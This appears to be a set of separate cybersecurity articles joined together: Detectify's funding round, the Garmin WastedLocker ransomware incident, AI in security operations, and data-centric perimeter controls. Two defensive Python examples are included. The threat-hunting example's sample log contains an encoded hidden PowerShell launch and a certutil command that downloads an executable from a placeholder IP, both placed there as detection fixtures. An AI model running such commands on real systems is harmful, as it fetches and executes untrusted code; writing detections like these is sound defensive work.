Detectify, the Sweden-born cybersecurity startup that offers a website vulnerability scanner powered by the crowd, has raised €21 million in further funding.
Leading the round is London-based VC firm Balderton Capital, with participation from existing investors Paua Ventures, Inventure and Insight Partners.
Detectify says the new funding will be used to continue to hire “world-class” talent to further accelerate the company’s growth and deliver on its mission to reduce internet security vulnerabilities.
Founded in late 2013 by a self-described group of “elite hackers” from Sweden, the company offers a website security tool that uses automation to scan websites for vulnerabilities to help customers (i.e. developers) stay on top of security. The more unique part of the service, however, is that it is in part maintained — or, rather, kept up to date — via the crowd in the form of Detectify’s “ethical hacker network.”
As we explained when the startup raised its €5 million Series A round, this sees top-ranked security researchers submit vulnerabilities that are then built into the Detectify scanner and used in customers’ security tests. The clever part is that researchers get paid every time their submitted module identifies a vulnerability on a customer’s website. In other words, incentives are kept aligned, giving Detectify a potential advantage and greater scale compared to similar website security automation tools.
Detectify co-founder and CEO Rickard Carlsson tells me the company has made a lot of progress in the past 12 months, including building out the crowdsourcing part of its proposition in order to grow the number of known vulnerabilities.
“Modules from crowdsourcing hackers have now generated 110,000 plus vulnerabilities in our customer base,” he says. “And the community is about 2.5 times as large now”.
In the last year, Detectify has also expanded its client base in the U.S, and says it now counts leading software companies such as Trello, Spotify and King as customers.
The young startup seems to be scoring well on the gender diversity front, too. It says that almost half (45%) of its 83 employees are female, including 50% at C-level. In addition, there are close to 30 nationalities across Detectify’s Stockholm and Boston offices.
Adds James Wise, partner at Balderton Capital, in a statement: “Detectify brings together the power of human ingenuity, the immense scalability of software, and a strong culture of transparency and integrity to provide world-class security to everyone. This is a fundamentally new approach to protecting businesses from new cyber security threats, and alongside our other cyber security investments, including Darktrace, Recorded Future & Tessian, we see Detectify as part of a new wave of solutions to make the web safer for everyone.”
[Records Exposed: N/A | Industry: Technology | Type Of Attack: Ransomware]
On July 23, 2020, Garmin users took to Twitter to report that website features and services were inaccessible. Four days later, Garmin released an official statement confirming that a cyber attack had taken place, and assured users that no personally identifiable information (PII) had been compromised.
Garmin is best known for GPS-based fitness wearables, but the company also serves the aviation market, and its aviation services, on which some flight operations depend, were disrupted by the attack as well.
The attackers deployed the WastedLocker ransomware, which encrypts key data across a company's infrastructure. In Garmin's case, website functions, customer support, and user applications were all affected. Unlike ransomware operations that also steal data and threaten to publish it, WastedLocker was not reported to exfiltrate identifying information; it renders systems unusable until they are decrypted, and the operators then demand payment for the decryption key. Garmin has not confirmed it, but the company is widely believed to have paid the $10 million ransom.
In cyber crime, however, nothing is cut and dried. Security researchers have linked this relatively new ransomware family to the Russian criminal group known as Evil Corp, which the U.S. Treasury sanctioned in December 2019. If that attribution holds, and the attack was run by Evil Corp itself rather than as a ransomware-for-hire job, Garmin faced a difficult choice: restoring its systems meant risking a violation of U.S. sanctions against Evil Corp.
Third-party negotiators can act as intermediaries between victim and attackers. Garmin reportedly engaged a cyber security firm in New Zealand to assist with recovery, which suggests that firm acted as the go-between for the $10 million payment. Note that using an intermediary does not by itself remove sanctions exposure, since U.S. sanctions also prohibit facilitating a payment to a sanctioned party; whether the arrangement was lawful is a question Garmin has not addressed. The company has declined to discuss the incident beyond its bare-bones press release on the 27th.
While ransomware attacks are nothing new, they are rapidly growing in sophistication and scale. Organized cyber crime groups appear to be investing their “earnings” back into their infrastructure much the way a startup reinvests its profits: building specialized teams to operate at larger scale, target larger organizations, and lower their rate of detection.
Historically, government agencies, cities, hospitals, and universities have been the most common ransomware targets, with ransoms averaging around $100,000. Now, groups like Evil Corp appear to have shifted their sights to Fortune 500 companies, with ransom demands in the millions. Garmin may mark the start of a ransomware era that specifically targets large U.S. corporations. That does not mean SMBs are off the hook: as Evil Corp and its peers go after bigger fish, the pond opens up for newer crews to take their place.
Whether to pay a ransom is ultimately a business decision. A Tripwire article by Graham Cluley offers this perspective: “That ultimately is a decision that only you can make. Bear in mind that the more companies that pay a ransom, the more the criminals are likely to launch similar attacks in the future. At the same time, you may feel that your business needs to make the difficult but pragmatic decision to pay the criminals if you feel your company cannot survive any other way.”
At its core, preventing ransomware is about a holistic security program: an attacker has nothing to ransom if it cannot get into enterprise systems, and many enterprise intrusions begin with ordinary phishing. That is why organizations of all sizes must invest time and money in strong security policies and practices such as:
Making it easy to report suspicious emails, for example with a “report phishing” button in the mail client that feeds straight into the incident response process
Giving employees the least access they need to do their job (least privilege), a core component of a zero-trust strategy
Practicing and testing anti-phishing awareness internally or with the help of a third-party vendor
Reducing workplace stress and hurry, since attackers prey on psychological responses such as carelessness and haste
The cybersecurity landscape faces higher threat levels than ever: data volumes reportedly quadrupling every 36 months, computing power and data transfer speeds growing just as fast, and a diversity of IoT devices ushering in a new era of automation.
To get a grip on this, more organizations are exploring how AI can help. The next-generation security operations center (SOC) incorporates automation and orchestration: automation, backed by AI and machine learning, applied to both defensive operations and threat hunting, and orchestration managing how multiple tools and platforms work together.
“AI and ML are not only used in a next-generation SOC to enhance detection and prevention activities, but also, increasingly, to augment incident response actions such as containment actions, ticket creation, and user engagement to triage and/or validate a suspicious action,” stated John Harrison, Director, Cybersecurity Center of Excellence for Criterion, in an article he wrote for Nextgov. “The applications of AI and ML reduce the time spent on each alert and improve the Mean Time to Detect as well as the Mean Time to Repair.” Criterion is a systems integrator focused on solutions for government agencies.
New challenges facing SOCs include: serving the needs of remote and teleworking employees, a dramatically increased number during the pandemic; managing multiple cloud platforms; and dealing with an exploding number of IoT devices that need to be configured.
“The structure of SOCs is already adapting and evolving to bring together defensive operations and the analysis of emerging threats with the strategic introduction of new technologies. The result is a mature, flexible, risk-based and cost-efficient approach to ensure the crown jewels of an enterprise remain secure,” Harrison stated.
Established approaches are being updated. Security information and event management (SIEM), a term coined in 2005, provides real-time analysis of security alerts generated by applications and network hardware. Firewalls, malware protection and other signature-based controls solve part of the problem, but only the part they have signatures for. Successful threat hunting requires a proactive search of large data sets, increasingly with the help of AI and machine learning, to identify threats that could evade, or have already evaded, current detection capabilities.
“The application of automation to threat hunting enables faster response time and more agile and improved recommendations on responses. It reduces attack vectors, breaches, and breach attempts and enables organizations to move from a purely reactive response to operating ahead of threats,” Harrison stated.
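The simplest form of the hunt described above is frequency analysis, often called "stacking": count how many hosts in the fleet exhibit each behaviour, treat the common ones as baseline, and push the rare ones to an analyst even when no signature fires. The script below is an added example, not code from the article, from Criterion, or from any SOC product; the process-execution log lines, host names, and the tiny signature list are constructed for illustration (the IP address is from a reserved documentation range).

```python
"""Long-tail ("stacking") hunt over process-execution telemetry.

Added example, not from the article or any product it mentions.
Idea: parent/child process pairs common across the fleet are probably
benign; pairs seen on only a handful of hosts deserve an analyst's eyes,
even when the signature layer has nothing to say about them.
"""
from collections import defaultdict
import csv
import io

# Constructed sample telemetry: host,user,parent,image,cmdline
SAMPLE_LOG = """host,user,parent,image,cmdline
ws01,alice,explorer.exe,outlook.exe,outlook.exe
ws02,bob,explorer.exe,outlook.exe,outlook.exe
ws03,carol,explorer.exe,outlook.exe,outlook.exe
ws01,alice,explorer.exe,chrome.exe,chrome.exe
ws02,bob,explorer.exe,chrome.exe,chrome.exe
ws03,carol,explorer.exe,chrome.exe,chrome.exe
ws04,dave,explorer.exe,chrome.exe,chrome.exe
ws01,alice,services.exe,svchost.exe,svchost.exe -k netsvcs
ws02,bob,services.exe,svchost.exe,svchost.exe -k netsvcs
ws03,carol,services.exe,svchost.exe,svchost.exe -k netsvcs
ws04,dave,services.exe,svchost.exe,svchost.exe -k netsvcs
ws03,carol,winword.exe,powershell.exe,powershell.exe -nop -w hidden -enc SQBFAFgA
ws04,dave,excel.exe,cmd.exe,cmd.exe /c certutil -urlcache -f http://198.51.100.7/a.exe a.exe
"""

# Deliberately tiny stand-in for the signature-based layer; neither hunting
# hit below matches it, which is the point of hunting.
SIGNATURES = ("mimikatz", "procdump")


def parse_log(text):
    """Parse the CSV telemetry into a list of dicts, one per process start."""
    return list(csv.DictReader(io.StringIO(text)))


def stack_parent_child(events):
    """Count on how many distinct hosts each (parent, image) pair occurs."""
    hosts_per_pair = defaultdict(set)
    for e in events:
        hosts_per_pair[(e["parent"], e["image"])].add(e["host"])
    return {pair: len(hosts) for pair, hosts in hosts_per_pair.items()}


def hunt_rare_pairs(events, max_hosts=1):
    """Return events whose (parent, image) pair is seen on at most max_hosts
    hosts and that the signature layer did not already catch, rarest first."""
    prevalence = stack_parent_child(events)
    fleet_size = len({e["host"] for e in events})
    hits = []
    for e in events:
        pair = (e["parent"], e["image"])
        if prevalence[pair] > max_hosts:
            continue  # common across the fleet: baseline, not a lead
        if any(sig in e["cmdline"].lower() for sig in SIGNATURES):
            continue  # already covered by the signature layer
        hits.append({
            "host": e["host"], "user": e["user"],
            "parent": e["parent"], "image": e["image"],
            "hosts_seen": prevalence[pair], "fleet_hosts": fleet_size,
            "cmdline": e["cmdline"],
        })
    hits.sort(key=lambda h: (h["hosts_seen"], h["host"]))
    return hits


if __name__ == "__main__":
    for h in hunt_rare_pairs(parse_log(SAMPLE_LOG)):
        print(f'{h["host"]} ({h["user"]}): {h["parent"]} -> {h["image"]} '
              f'seen on {h["hosts_seen"]}/{h["fleet_hosts"]} hosts: {h["cmdline"]}')
```

On the constructed sample, the Office-spawned PowerShell and the certutil download are the only two leads; the mail client, browser and service host pairs are stacked away as fleet-wide baseline. On real telemetry the same logic runs over millions of rows, and the `max_hosts` threshold is where the AI/ML the article mentions earns its keep, replacing a fixed cutoff with a learned baseline per host role.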
AI Seen As Potentially Helping Extend Budgets by Delivering More Value
The push to incorporate AI into cybersecurity is also being seen as a way to extend corporate security budgets under pressure.
AI in cybersecurity until 2014 was a marketing term, stated Raef Meeuwisse, CISM, CISA, author of “Cybersecurity for Business,” in a recent account in infosecurity. He is not a fan of machine learning on its own applied to cybersecurity. “The problem with machine learning is that the AI is limited to the features that it has been taught to expect,” he states. “Fooling a machine learning security system is as simple as adding an unexpected/unprogrammed feature into the exploit.”
Artificial neural networks, in contrast, effectively self-organize how the system reviews and manages the data it has access to. “It does not need to have seen the behavior before, it only has to recognize the outcome, or potential outcome,” he states.
Security programs using AI technologies, often running as local agents, can now understand and block rogue identity and access activities, identify and quarantine malware, prevent data loss, adapt the security configurations of devices, with few or no errors. “The progression and investment into artificial neural network technology means that some security software technologies have now reached a level of competency that was unthinkable 10 years ago,” Meeuwisse states.
In some SIEM environments, the AI applied to security can inspect, alert and block based on analysis that would be impossible to achieve manually. “The AI technologies are literally performing the equivalent of years of manual security work every minute,” he states.
As the AI technologies become more stable, the author sees the price point moving lower as well. The average AI anti-malware solution for home use is now priced at less than $1 per device per month. “My own experience using these technologies is that they are incredibly helpful,” he stated.
AI is a New Learning Requirement for Cybersecurity Professionals
Cybersecurity professionals working in enterprises now face a requirement to learn how AI and machine learning can work within their systems. “AI/ML has a direct effect on cybersecurity teams and brings a whole new set of needs to the enterprise,” stated Bob Peterson, CTO architect at Sungard Availability Services, an IT service management company, in a recent account.
The creation and maintenance of the AI/ML security system requires a joint effort from many contributors. “The team requires domain experts that understand the security data and how it is generated, data analysis and data science experts that understand data analysis techniques, and AI/ML experts that translate this information into the right models and algorithms,” Peterson stated.
When hiring, it’s good to be open-minded. Maybe a candidate has a needed skill but needs to come up the learning curve in cybersecurity. “It may be easier to educate them on cybersecurity versus the technology skill itself,” Peterson stated.
Cybersecurity also faces a challenge in diversity of staff. Only 20% of security professionals are women and only 26% in the US are from marginalized communities, according to Sivan Nir, a threat intelligence team leader at Skybox Security, a cybersecurity software supplier.
“This is a big problem because cybersecurity, in particular, is a field that thrives on diversity,” Nir stated. “If you think about who we are up against, cybercriminals come from diverse backgrounds, so it is crucial our teams have different points of views and a variety of thought processes.”
Nir emphasized the importance of making people—especially girls and underrepresented groups—aware of tech and cybersecurity as a career path from a young age. “Working in technological fields should be seen as exciting, not intimidating,” she stated. “Cybersecurity, in particular, is never boring—it tackles real-world challenges at a fast pace every day.”
Before the current millennium, enterprise talent went to the office. It was straightforward: staff sat at enterprise workstations on prem, inside a known, defined perimeter. The firewall, VPN, LAN and antivirus environment was within the gaze, and right under the nose, of the CISO.
CISO priorities have always centered on securing that perimeter; managing technology vulnerabilities to maintain visibility over the whole threat landscape was the day-in, day-out activity. The castle-and-moat strategy worked well when everything was inside the castle. But as cloud migration began and remote work continued, the perimeter expanded. The best CISOs evolved with these changes and shifted their focus to nimble, privilege-based access rather than a simple VPN on/off switch. Data at rest was always in view; data in transit has been tougher to track. With global enterprises moving to a distributed structure, visibility over data in transit is now a genuine problem.
With users routinely accessing data from non-enterprise endpoints, an updated mindset and approach come into focus. In our interactive discussion on the CSHub Mid-Year Report, Dennis Leber noted, “data is the new perimeter.”
We have been using the phrase infinite perimeter on CSHub to describe what must be managed, access, endpoint, cloud and now IoT, as ever expanding. The distributed workforce, plus your third-party partners, plus their third-party partners, pushes access management and the concepts of least privilege and zero trust to the fore. Those same distributed users bringing their own devices turn endpoint security into a game of cat and mouse. Your network now includes the home routers of your distributed workforce, along with their smart speakers.
A data breach can now occur by myriad means. So rather than focusing on the point in the perimeter that was breached, focus on the data.
Controls For The Data Breach
A breach has always been about the data, but while the perimeter was easily defined, the information security officer could reasonably concentrate on the perimeter itself. Keeping an ever-widening view of that exponentially expanding perimeter is still mandatory; adding an explicit focus on data at rest and data in transit is what brings clarity to that infinite-perimeter view.
The focus has been on knowing where the crown jewels sit and protecting that space. CSHub Executive Board Member and IEEE Public Visibility Initiative spokesperson Kayne McGladrey notes, “if you don’t know where your data live, you can’t apply any effective policies around access controls or do any meaningful incident response or do any meaningful security awareness.”
Focusing on the Data in the Data Breach
As data exfiltration abounds, getting a handle on data in transit is of course, key. McGladrey continues, “right now, for almost all businesses data is the most important thing they have, whether it’s PII, PHI, IP. The threat actors are not attacking because people have nice office spaces that are currently empty, and they’re not attacking because they have nice manufacturing capacity, that’s also operating at a lower rate. They’re attacking because they want to steal the data and do things with it, depending on their motivation. And if you can’t say empirically, ‘We know where all those data are,’ you can not apply controls.”
But having basic controls over data in transit is simply not good enough. McGladrey expounds, “Build both policies to require encryption of data in transit, as well as policies around approved services to use, and then implement telemetry. If you don’t have a policy that says, ‘We’re going to have a standards list of approved services for transmitting data across organizations, and we’re going to have enforcement of that in our technical control’ (think like a CASB at the very simplest level), then ultimately you have no idea where your data are going at the end of the day.”
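The three pieces McGladrey names (a written policy of approved services and required encryption, a technical control that enforces it, and telemetry that tells you where data actually went) can be sketched in a few dozen lines. The script below is an added example, not code from the article, from any CSHub contributor, or from a real CASB product; the approved-service list, the users, and the proxy log lines are constructed for illustration, and every domain is under the reserved `.example` TLD.

```python
"""Egress telemetry evaluated against a data-in-transit policy.

Added example, not from the article or any product. The smallest version of
"policy + enforcement + telemetry": a standards list of approved services,
an encryption requirement, and a pass over proxy logs that reports every
outbound transfer the policy does not cover.
"""
from dataclasses import dataclass
from urllib.parse import urlsplit

# Policy: approved services for transmitting data across organizations,
# keyed by destination host. Hypothetical names.
APPROVED_SERVICES = {
    "files.corp.example": "internal file share",
    "sharing.vendor-a.example": "contracted vendor portal",
}
ENCRYPTION_REQUIRED = True
LARGE_UPLOAD_BYTES = 10 * 1024 * 1024  # 10 MiB: exfiltration-sized

# Constructed proxy log: timestamp user method url bytes_out
PROXY_LOG = """\
2020-08-03T09:12:01Z alice PUT https://files.corp.example/q3/report.xlsx 512000
2020-08-03T09:13:44Z bob POST http://sharing.vendor-a.example/upload 2048000
2020-08-03T09:20:10Z carol PUT https://drive.personal-cloud.example/u/backup.zip 48000000
2020-08-03T09:21:03Z alice GET https://files.corp.example/q3/report.xlsx 0
2020-08-03T09:30:27Z dave POST https://sharing.vendor-a.example/api/v1/docs 35000000
"""


@dataclass
class Finding:
    timestamp: str
    user: str
    host: str
    reason: str
    bytes_out: int


def parse_proxy_log(text):
    """Split each log line into fields and pull scheme and host from the URL."""
    events = []
    for line in text.splitlines():
        ts, user, method, url, nbytes = line.split()
        parts = urlsplit(url)
        events.append({
            "timestamp": ts, "user": user, "method": method,
            "scheme": parts.scheme, "host": parts.hostname,
            "bytes_out": int(nbytes),
        })
    return events


def evaluate(events):
    """Apply the policy to every transfer that carries data outward."""
    findings = []
    for e in events:
        if e["method"] not in ("PUT", "POST") or e["bytes_out"] == 0:
            continue  # reads are telemetry but not policy violations here
        reasons = []
        if e["host"] not in APPROVED_SERVICES:
            reasons.append("destination not on approved-services list")
            if e["bytes_out"] >= LARGE_UPLOAD_BYTES:
                reasons.append("large upload to unapproved destination")
        if ENCRYPTION_REQUIRED and e["scheme"] != "https":
            reasons.append("data in transit not encrypted")
        for reason in reasons:
            findings.append(Finding(e["timestamp"], e["user"], e["host"],
                                    reason, e["bytes_out"]))
    return findings


def summarize(findings):
    """Group reasons per user, the shape a security-awareness follow-up needs."""
    per_user = {}
    for f in findings:
        per_user.setdefault(f.user, []).append(f.reason)
    return per_user


if __name__ == "__main__":
    for f in evaluate(parse_proxy_log(PROXY_LOG)):
        print(f"{f.timestamp} {f.user} -> {f.host}: {f.reason} ({f.bytes_out} bytes)")
```

Run against the constructed log, dave's 35 MB upload to an approved, encrypted vendor portal produces no finding at all, which is the policy working as intended: the goal is not to flag big transfers but to know where data goes and to catch the plaintext upload (bob) and the personal cloud drive (carol). A real deployment replaces the inline log with a proxy or CASB feed and the dictionary with the organization's actual standards list.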
Knowing everything about that most-important data in transit leads you to a cogent understanding of your actual enterprise risk. Horizon Power CISO and CSHub Executive Board Member Jeff Campbell notes, “It’s all got to be based on risk. Tapping into the corporate risk framework at your organization and understanding what they consider to be important as a strategic enabler, and then understanding that security- particularly now in this digital future- plays a very, very important part in enabling those strategic initiatives.”
Prioritization and risk go hand in hand. If the wrong things are prioritized, your risk increases. McGladrey notes that this is all the more important in a distributed enterprise. “Some of the projects that get spun up aren’t really going to have a material reduction in risk, and they’re not going to have a significant benefit to the business, and with a nomadic workforce that becomes a challenge.”
The organization should of course already be operating in line with an industry standard such as the Center for Internet Security's Critical Security Controls. That establishes that the enterprise is secure where the business is today. Zeroing in on the larger long-term enterprise goals provides the context of where the business is going. Understanding the board's and C-suite's cyber security focus points shows how you can connect cyber security to those business goals. And when that connection is made, so is the business case for your current and future budget.
Campbell sums up, “So how do you prioritize? You develop metrics consistent with what your board likes to see around cyber security, as well as how that ties into delivery of those initiatives. Those metrics need to be framed in a way that is a common language, and the common language at the board and executive layer. And that’s how you prioritize.”
The theme of business enablement has run through the industry over the past few years and has now reached a fever pitch. Business enablement used to mean ensuring that the CISO could simply do what they knew they needed to do. We have now turned the corner: business enablement can help a CISO understand how to prioritize what they need to do.